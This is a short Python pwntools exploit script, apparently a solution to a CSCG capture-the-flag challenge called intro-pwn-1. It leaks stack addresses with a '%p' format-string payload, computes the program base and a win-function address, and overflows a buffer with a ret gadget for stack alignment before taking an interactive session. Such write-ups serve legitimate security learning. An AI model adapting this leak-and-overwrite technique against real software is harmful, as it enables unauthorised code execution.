from pwn import *
import os

if args.debug:
    p = process("ncat localhost 1024".split())
else:
    if len(sys.argv) < 2:
        print("USAGE: exploit.py <ID>")
        sys.exit(1)
    p = process("ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"
            .format(sys.argv[1]).split())

p.recvuntil(b"Enter your witch name:")

p.sendline(b"%p " * 50)

leaked = p.recvuntil(b"enter your magic spell:")
leak_vals = leaked.decode().split(" ")

for i,v in enumerate(leak_vals):
    print(i, "->", v)

base = int(leak_vals[41], 16) - 2537
win = base + 0x9ec
extra_ret = base + 0x0b2d

print("RERET:", hex(extra_ret))
print("WIN:", hex(win))

# Why do we need to realign the stack with another return?

# The `movaps xmmword ptr` instruction requires the stack pointer to be
# 16 byte aligned. Because of this we need to return twice, such that
# the stack pointer moves down another 8 bytes.

p.send("Expelliarmus\x00" + "A" * 251)
p.send(p64(extra_ret))
p.send(p64(win))
p.send("\n")

p.interactive()